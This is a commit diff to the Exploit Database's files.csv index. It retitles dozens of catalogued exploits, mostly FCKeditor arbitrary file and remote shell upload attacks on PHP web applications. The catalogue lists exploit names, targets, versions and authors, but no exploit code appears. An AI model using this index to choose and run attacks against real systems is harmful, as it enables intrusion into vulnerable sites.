DB: 2015-07-30

4 new exploits
Offensive Security 2015-07-30 05:02:27 +00:00
parent 7c8d57574c
commit 95ce541193
30 changed files with 2652 additions and 2176 deletions

files.csv

@ -1226,7 +1226,7 @@ id,file,description,date,author,platform,type,port
1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0
1482,platforms/php/webapps/1482.php,"SPIP <= 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (non steam) Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0
1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 (connector.php) - Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0
1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager - connector.php) Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0
1485,platforms/php/webapps/1485.php,"RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit",2006-02-09,rgod,php,webapps,0
1486,platforms/linux/remote/1486.c,"Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532
1487,platforms/linux/remote/1487.c,"OpenVMPSd <= 1.3 - Remote Format String Exploit (Multiple Targets)",2006-02-10,"Gotfault Security",linux,remote,1589
@ -1671,7 +1671,7 @@ id,file,description,date,author,platform,type,port
1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module (lid) Remote SQL Injection Vulnerability",2006-06-28,KeyCoder,php,webapps,0
1962,platforms/osx/local/1962.pl,"Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0
1963,platforms/php/webapps/1963.txt,"GeekLog <= 1.4.0sr3 (_CONF[path]) Remote File Include Vulnerabilities",2006-06-29,Kw3[R]Ln,php,webapps,0
1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 f(u)ckeditor - Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445
1967,platforms/windows/dos/1967.c,"Microsoft Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0
1968,platforms/php/webapps/1968.php,"deV!Lz Clanportal [DZCP] <= 1.34 (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0
@ -1740,7 +1740,7 @@ id,file,description,date,author,platform,type,port
2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Remote Blind SQL Injection Exploit",2006-07-18,"Jacek Wlodarczyk",php,webapps,0
2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit (2)",2006-07-18,"w4g.not null",php,webapps,0
2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0
2035,platforms/php/webapps/2035.php,"toendaCMS <= 1.0.0 (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0
2035,platforms/php/webapps/2035.php,"toendaCMS <= 1.0.0 - (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0
2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 Cookie Modification Privilege Escalation Vulnerability",2006-07-18,FarhadKey,php,webapps,0
2037,platforms/windows/dos/2037.c,"Dumb <= 0.9.3 (it_read_envelope) Remote Heap Overflow PoC",2006-07-19,"Luigi Auriemma",windows,dos,0
2039,platforms/windows/dos/2039.pl,"Microsoft Internet Explorer 6 (Content-Type) Stack Overflow Crash",2006-07-20,Firestorm,windows,dos,0
@ -2394,7 +2394,7 @@ id,file,description,date,author,platform,type,port
2702,platforms/php/webapps/2702.php,"Lithium CMS <= 4.04c (classes/index.php) Local File Include Exploit",2006-11-02,Kacper,php,webapps,0
2703,platforms/php/webapps/2703.txt,"Article System 0.6 (volume.php) Remote File Include Vulnerability",2006-11-02,GregStar,php,webapps,0
2704,platforms/php/webapps/2704.txt,"freewebshop.org script <= 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0
2706,platforms/php/webapps/2706.txt,"MODx CMS <= 0.9.2.1 (FCKeditor) Remote File Include Vulnerability",2006-11-03,nuffsaid,php,webapps,0
2706,platforms/php/webapps/2706.txt,"MODx CMS <= 0.9.2.1 - (FCKeditor) Remote File Include Vulnerability",2006-11-03,nuffsaid,php,webapps,0
2707,platforms/php/webapps/2707.php,"PostNuke <= 0.763 (PNSV lang) Remote Code Execution Exploit",2006-11-03,Kacper,php,webapps,0
2708,platforms/windows/dos/2708.c,"Nullsoft Winamp <= 5.3 - (Ultravox-Max-Msg) Heap Overflow DoS PoC",2006-11-03,cocoruder,windows,dos,0
2709,platforms/php/webapps/2709.txt,"Creasito E-Commerce Content Manager (admin) Authentication Bypass",2006-11-03,SlimTim10,php,webapps,0
@ -5241,7 +5241,7 @@ id,file,description,date,author,platform,type,port
5615,platforms/php/webapps/5615.txt,"AS-GasTracker 1.0.0 Insecure Cookie Handling Vulnerability",2008-05-14,t0pP8uZz,php,webapps,0
5616,platforms/php/webapps/5616.txt,"ActiveKB <= 1.5 Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,php,webapps,0
5617,platforms/php/webapps/5617.txt,"Internet Photoshow (Special Edition) - Insecure Cookie Handling Vuln",2008-05-14,t0pP8uZz,php,webapps,0
5618,platforms/php/webapps/5618.txt,"La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0
5618,platforms/php/webapps/5618.txt,"La-Nai CMS <= 1.2.16 - (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0
5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0
5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 (rfi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0
5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript (page_to_include) RFI Vulnerability",2008-05-14,HaCkeR_EgY,php,webapps,0
@ -5310,16 +5310,16 @@ id,file,description,date,author,platform,type,port
5684,platforms/php/webapps/5684.txt,"Joomla Component Artist (idgalery) SQL Injection Vulnerability",2008-05-28,Cr@zy_King,php,webapps,0
5685,platforms/php/webapps/5685.txt,"FlashBlog (articulo_id) Remote SQL Injection Vulnerability",2008-05-28,HER0,php,webapps,0
5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader <= 8.1.2 - Malformed PDF Remote DoS PoC",2008-05-29,securfrog,windows,dos,0
5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability",2008-05-29,QTRinux,php,webapps,0
5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerabilitty (win)",2008-05-29,gmda,php,webapps,0
5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0
5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 - (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0
5692,platforms/php/webapps/5692.pl,"Mambo Component mambads <= 1.0 RC1 Beta SQL Injection Vulnerability",2008-05-29,Houssamix,php,webapps,0
5693,platforms/php/webapps/5693.txt,"CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability",2008-05-29,Stack,php,webapps,0
5694,platforms/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,623
5695,platforms/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,8800
5696,platforms/php/webapps/5696.pl,"PHP Booking Calendar 10 d Remote SQL Injection Exploit",2008-05-29,Stack,php,webapps,0
5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
5698,platforms/php/webapps/5698.txt,"HiveMaker Professional <= 1.0.2 (cid) SQL Injection Vulnerability",2008-05-30,K-159,php,webapps,0
5699,platforms/php/webapps/5699.txt,"PsychoStats <= 2.3.3 - Multiple Remote SQL Injection Vulnerabilities",2008-05-31,Mr.SQL,php,webapps,0
5700,platforms/php/webapps/5700.htm,"CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload Exploit",2008-05-31,irk4z,php,webapps,0
@ -5390,7 +5390,7 @@ id,file,description,date,author,platform,type,port
5767,platforms/php/webapps/5767.php,"Flux CMS <= 1.5.0 (loadsave.php) Remote Arbitrary File Overwrite Exploit",2008-06-09,EgiX,php,webapps,0
5768,platforms/php/webapps/5768.txt,"pNews 2.08 (shownews) Remote SQL Injection Vulnerability",2008-06-09,Cr@zy_King,php,webapps,0
5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 - Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0
5770,platforms/php/webapps/5770.php,"Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0
5770,platforms/php/webapps/5770.php,"Achievo <= 1.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0
5771,platforms/php/webapps/5771.txt,"ErfurtWiki <= R1.02b (css) Local File Inclusion Vulnerabilities",2008-06-10,Unohope,php,webapps,0
5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 (comments) Remote SQL Injection Vulnerability",2008-06-10,Unohope,php,webapps,0
5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 (xss/SQL) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0
@ -5463,7 +5463,7 @@ id,file,description,date,author,platform,type,port
5841,platforms/php/webapps/5841.txt,"ThaiQuickCart (sLanguage) Local File Inclusion Vulnerability",2008-06-17,"CWH Underground",php,webapps,0
5842,platforms/php/webapps/5842.txt,"PHP Site Lock 2.0 (index.php page) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0
5843,platforms/windows/dos/5843.html,"P2P Foxy Out of Memory Denial of Service Exploit",2008-06-17,Styxosaurus,windows,dos,0
5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 (fckeditor) Arbitrary File Upload Exploit",2008-06-17,Stack,php,webapps,0
5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-17,Stack,php,webapps,0
5845,platforms/php/webapps/5845.txt,"MyShoutPro 1.2 Final Insecure Cookie Handling Vulnerability",2008-06-17,Stack,php,webapps,0
5846,platforms/php/webapps/5846.txt,"eroCMS <= 1.4 (index.php site) SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0
5847,platforms/php/webapps/5847.txt,"WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability",2008-06-17,Cr@zy_King,php,webapps,0
@ -5525,7 +5525,7 @@ id,file,description,date,author,platform,type,port
5904,platforms/php/webapps/5904.txt,"Hedgehog-CMS 1.21 (header.php) Local File Inclusion Vulnerability",2008-06-22,CraCkEr,php,webapps,0
5905,platforms/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - (LFI/XSS) Multiple Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0
5906,platforms/php/webapps/5906.txt,"odars CMS 1.0.2 - Remote File Inclusion Vulnerability",2008-06-22,CraCkEr,php,webapps,0
5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
5908,platforms/php/webapps/5908.txt,"HoMaP-CMS 0.1 (index.php go) Remote SQL Injection Vulnerability",2008-06-23,SxCx,php,webapps,0
5909,platforms/php/webapps/5909.pl,"BlogPHP 2.0 - Remote Privilege Escalation Exploit",2008-06-23,Cod3rZ,php,webapps,0
5910,platforms/php/webapps/5910.txt,"Ready2Edit (pages.php menuid) Remote SQL Injection Vulnerability",2008-06-23,Mr.SQL,php,webapps,0
@ -5540,8 +5540,8 @@ id,file,description,date,author,platform,type,port
5919,platforms/php/webapps/5919.txt,"mm chat 1.5 - (LFI/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
5920,platforms/php/webapps/5920.txt,"ourvideo CMS 9.5 (rfi/lfi/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
5921,platforms/php/webapps/5921.txt,"cmsWorks 2.2 RC4 (mod_root) Remote File Inclusion Vulnerability",2008-06-23,CraCkEr,php,webapps,0
5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
5924,platforms/php/webapps/5924.txt,"Relative Real Estate Systems <= 3.0 (listing_id) SQL Injection Vuln",2008-06-24,K-159,php,webapps,0
5925,platforms/php/webapps/5925.txt,"ShareCMS 0.1 - Multiple Remote SQL Injection Vulnerabilities",2008-06-24,"CWH Underground",php,webapps,0
5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G (firmware 1.00.9) Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0
@ -5562,7 +5562,7 @@ id,file,description,date,author,platform,type,port
5941,platforms/php/webapps/5941.txt,"polypager <= 1.0rc2 (sql/XSS) Multiple Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0
5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax <= 4.42 (category) SQL Injection Vulnerability",2008-06-26,boom3rang,php,webapps,0
5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0
5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0
5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework <= 0.6.4 - (fckeditor) Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0
5946,platforms/php/webapps/5946.txt,"Riddles Complete Website 1.2.1 (riddleid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
5947,platforms/php/webapps/5947.txt,"Tips Complete Website 1.2.0 (tipid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
5948,platforms/php/webapps/5948.txt,"Jokes Complete Website 2.1.3 (jokeid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
@ -5620,7 +5620,7 @@ id,file,description,date,author,platform,type,port
6002,platforms/php/webapps/6002.pl,"Joomla Component altas 1.0 - Multiple Remote SQL Injection Exploit",2008-07-04,Houssamix,php,webapps,0
6003,platforms/php/webapps/6003.txt,"Joomla Component DBQuery <= 1.4.1.1 RFI Vulnerability",2008-07-04,SsEs,php,webapps,0
6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote BoF Exploit",2008-07-04,"Karol Wiesek",windows,remote,0
6005,platforms/php/webapps/6005.php,"Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit",2008-07-04,EgiX,php,webapps,0
6005,platforms/php/webapps/6005.php,"Site@School <= 2.4.10 - (fckeditor) Session Hijacking / File Upload Exploit",2008-07-04,EgiX,php,webapps,0
6006,platforms/php/webapps/6006.php,"Thelia 1.3.5 - Multiple Vulnerabilities Exploit",2008-07-05,BlackH,php,webapps,0
6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - (LFI/XSS) Multiple Vulnerabilities",2008-07-05,Cr@zy_King,php,webapps,0
6008,platforms/php/webapps/6008.php,"ImperialBB <= 2.3.5 - Remote File Upload Exploit",2008-07-05,PHPLizardo,php,webapps,0
@ -5927,7 +5927,7 @@ id,file,description,date,author,platform,type,port
6341,platforms/php/webapps/6341.txt,"WeBid 0.5.4 (item.php id) Remote SQL Injection Vulnerability",2008-09-01,Stack,php,webapps,0
6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 (go) Remote SQL Injection Vulnerability",2008-09-01,e.wiZz!,php,webapps,0
6343,platforms/php/webapps/6343.txt,"CMSbright (id_rub_page) Remote SQL Injection Vulnerability",2008-09-01,"BorN To K!LL",php,webapps,0
6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0
6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0
6345,platforms/windows/dos/6345.html,"VMware COM API ActiveX Remote Buffer Overflow PoC",2008-09-01,shinnai,windows,dos,0
6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 (uid) SQL Injection Exploit",2008-09-01,"Virangar Security",php,webapps,0
6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 (artid) SQL Injection Vulnerability",2008-09-02,MustLive,php,webapps,0
@ -5941,7 +5941,7 @@ id,file,description,date,author,platform,type,port
6355,platforms/windows/remote/6355.txt,"Google Chrome Browser 0.2.149.27 Automatic File Download Exploit",2008-09-03,nerex,windows,remote,0
6356,platforms/php/webapps/6356.php,"Moodle <= 1.8.4 - Remote Code Execution Exploit",2008-09-03,zurlich.lpt,php,webapps,0
6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 (upload/sql/XSS) Multiple Vulnerabilities",2008-09-03,Alemin_Krali,php,webapps,0
6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-03,BugReport.IR,php,webapps,0
6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-03,BugReport.IR,php,webapps,0
6361,platforms/php/webapps/6361.txt,"Living Local Website (listtest.php r) SQL Injection Vulnerability",2008-09-03,"Hussin X",php,webapps,0
6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability",2008-09-04,"Hussin X",php,webapps,0
6363,platforms/php/webapps/6363.txt,"qwicsite pro (sql/XSS) Multiple Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0
@ -5987,14 +5987,14 @@ id,file,description,date,author,platform,type,port
6407,platforms/windows/remote/6407.c,"Microworld Mailscan 5.6.a Password Reveal Exploit",2008-09-09,SlaYeR,windows,remote,0
6408,platforms/php/webapps/6408.txt,"CMS Buzz (id) Remote SQL Injection Vulnerability",2008-09-09,"security fears team",php,webapps,0
6409,platforms/php/webapps/6409.txt,"Availscript Article Script (articles.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0
6410,platforms/php/webapps/6410.txt,"Kim Websites 1.0 (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-09,Ciph3r,php,webapps,0
6410,platforms/php/webapps/6410.txt,"Kim Websites 1.0 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-09,Ciph3r,php,webapps,0
6411,platforms/php/webapps/6411.txt,"Availscript Photo Album (pics.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0
6412,platforms/php/webapps/6412.txt,"Availscript Classmate Script (viewprofile.php) SQL Injection Vulnerability",2008-09-09,Stack,php,webapps,0
6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion Vulnerabilities",2008-09-10,SirGod,php,webapps,0
6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 (PAWWeb11.ocx) ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0
6416,platforms/php/webapps/6416.txt,"Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit",2008-09-10,StAkeR,php,webapps,0
6417,platforms/php/webapps/6417.txt,"Availscript Jobs Portal Script (jid) SQL Injection Vulnerability (auth)",2008-09-10,InjEctOr5,php,webapps,0
6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite / Jaw Portal free (fckeditor) Arbitrary File Upload Vuln",2008-09-10,reptil,php,webapps,0
6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - (fckeditor) Arbitrary File Upload Vuln",2008-09-10,reptil,php,webapps,0
6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0
6421,platforms/php/webapps/6421.php,"Wordpress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0
6422,platforms/php/webapps/6422.txt,"phpvid 1.1 (xss/SQL) Multiple Vulnerabilities",2008-09-10,r45c4l,php,webapps,0
@ -6021,7 +6021,7 @@ id,file,description,date,author,platform,type,port
6445,platforms/php/webapps/6445.txt,"SkaLinks 1.5 (register.php) Remote Arbitrary Add Editor Vulnerability",2008-09-12,mr.al7rbi,php,webapps,0
6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script <= 1.0 (cat_id) SQL Injection Vulnerability",2008-09-12,FIREH4CK3R,php,webapps,0
6447,platforms/php/webapps/6447.txt,"pNews 2.03 (newsid) Remote SQL Injection Vulnerability",2008-09-12,r45c4l,php,webapps,0
6448,platforms/php/webapps/6448.txt,"WebPortal CMS <= 0.7.4 (fckeditor) Arbitrary File Upload Vulnerability",2008-09-12,S.W.A.T.,php,webapps,0
6448,platforms/php/webapps/6448.txt,"WebPortal CMS <= 0.7.4 - (fckeditor) Arbitrary File Upload Vulnerability",2008-09-12,S.W.A.T.,php,webapps,0
6449,platforms/php/webapps/6449.php,"pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit",2008-09-13,Stack,php,webapps,0
6450,platforms/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit",2008-09-13,ka0x,php,webapps,0
6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion/PHPInfo Disclosure Vulns",2008-09-13,SirGod,php,webapps,0
@ -6143,7 +6143,7 @@ id,file,description,date,author,platform,type,port
6570,platforms/windows/remote/6570.rb,"ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX BoF Exploit (meta)",2008-09-25,"Kevin Finisterre",windows,remote,0
6571,platforms/php/webapps/6571.txt,"openengine <= 2.0 beta4 - Remote File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0
6572,platforms/php/webapps/6572.txt,"Atomic Photo Album 1.1.0pre4 (XSS/SQL) Remote Vulnerabilities",2008-09-25,d3v1l,php,webapps,0
6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 (fckeditor) Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0
6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0
6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection Exploit",2008-09-26,Stack,php,webapps,0
6575,platforms/php/webapps/6575.txt,"barcodegen <= 2.0.0 (class_dir) Remote File Inclusion Vulnerability",2008-09-26,"Br0k3n H34rT",php,webapps,0
6576,platforms/php/webapps/6576.txt,"Ultimate Webboard 3.00 (Category) SQL Injection Vulnerability",2008-09-26,"CWH Underground",php,webapps,0
@ -6348,7 +6348,7 @@ id,file,description,date,author,platform,type,port
6780,platforms/php/webapps/6780.txt,"zeeproperty (adid) Remote SQL Injection Vulnerability",2008-10-18,"Hussin X",php,webapps,0
6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection Exploit",2008-10-18,Xianur0,php,webapps,0
6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit",2008-10-18,StAkeR,php,webapps,0
6783,platforms/php/webapps/6783.php,"Nuke ET <= 3.4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0
6783,platforms/php/webapps/6783.php,"Nuke ET <= 3.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0
6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader <= 1.5 - Remote File Creation Exploit",2008-10-18,StAkeR,php,webapps,0
6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite (init.php) Remote File Inclusion Vulnerability",2008-10-19,NoGe,php,webapps,0
6786,platforms/solaris/remote/6786.pl,"Solaris 9 [UltraSPARC] sadmind Remote Root Exploit",2008-10-19,kingcope,solaris,remote,111
@ -6710,7 +6710,7 @@ id,file,description,date,author,platform,type,port
7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 (API_HOME_DIR) RFI Vulnerability",2008-11-18,"Ghost Hacker",php,webapps,0
7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 Insecure Cookie Handling Vulnerability",2008-11-18,x0r,php,webapps,0
7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Remote Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0
7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 (fckeditor) Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0
7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 - (fckeditor) Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0
7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple LFI Exploit",2008-11-19,StAkeR,php,webapps,0
7160,platforms/php/webapps/7160.php,"MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit",2008-11-19,cOndemned,php,webapps,0
7162,platforms/php/webapps/7162.pl,"MauryCMS <= 0.53.2 - Remote Shell Upload Exploit",2008-11-19,StAkeR,php,webapps,0
@ -7586,7 +7586,7 @@ id,file,description,date,author,platform,type,port
8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 Persistent XSS Vulnerability",2009-02-16,rAWjAW,php,webapps,0
8058,platforms/windows/dos/8058.pl,"TPTEST <= 3.1.7 - Stack Buffer Overflow PoC",2009-02-16,ffwd,windows,dos,0
8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption PoC",2009-02-16,Nine:Situations:Group,windows,remote,0
8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 (fckeditor) Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0
8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 - (fckeditor) Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0
8061,platforms/php/webapps/8061.pl,"simplePms CMS <= 0.1.4 - LFI / Remote Command Execution Exploit",2009-02-16,Osirys,php,webapps,0
8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b (sql/XSS) Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
8063,platforms/php/webapps/8063.txt,"novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
@ -10766,7 +10766,7 @@ id,file,description,date,author,platform,type,port
11768,platforms/php/webapps/11768.txt,"Newbie CMS File Disclosure Vulnerability",2010-03-15,JIKO,php,webapps,0
11769,platforms/hardware/dos/11769.py,"iPhone Springboard Malformed Character Crash PoC",2010-03-15,"Chase Higgins",hardware,dos,0
11770,platforms/linux/dos/11770.txt,"WFTPD 3.3 - Remote REST DoS",2010-03-16,dmnt,linux,dos,21
11771,platforms/php/webapps/11771.txt,"osCMax 2.0 (fckeditor) Remote File Upload",2010-03-16,ITSecTeam,php,webapps,0
11771,platforms/php/webapps/11771.txt,"osCMax 2.0 - (fckeditor) Remote File Upload",2010-03-16,ITSecTeam,php,webapps,0
11772,platforms/php/webapps/11772.txt,"Joomla Component com_rwcards - Local File Inclusion",2010-03-16,"ALTBTA ",php,webapps,0
11773,platforms/php/webapps/11773.txt,"Free Real Estate Contact Form 1.09 - Local File Inclusion",2010-03-16,"Pouya Daneshmand",php,webapps,0
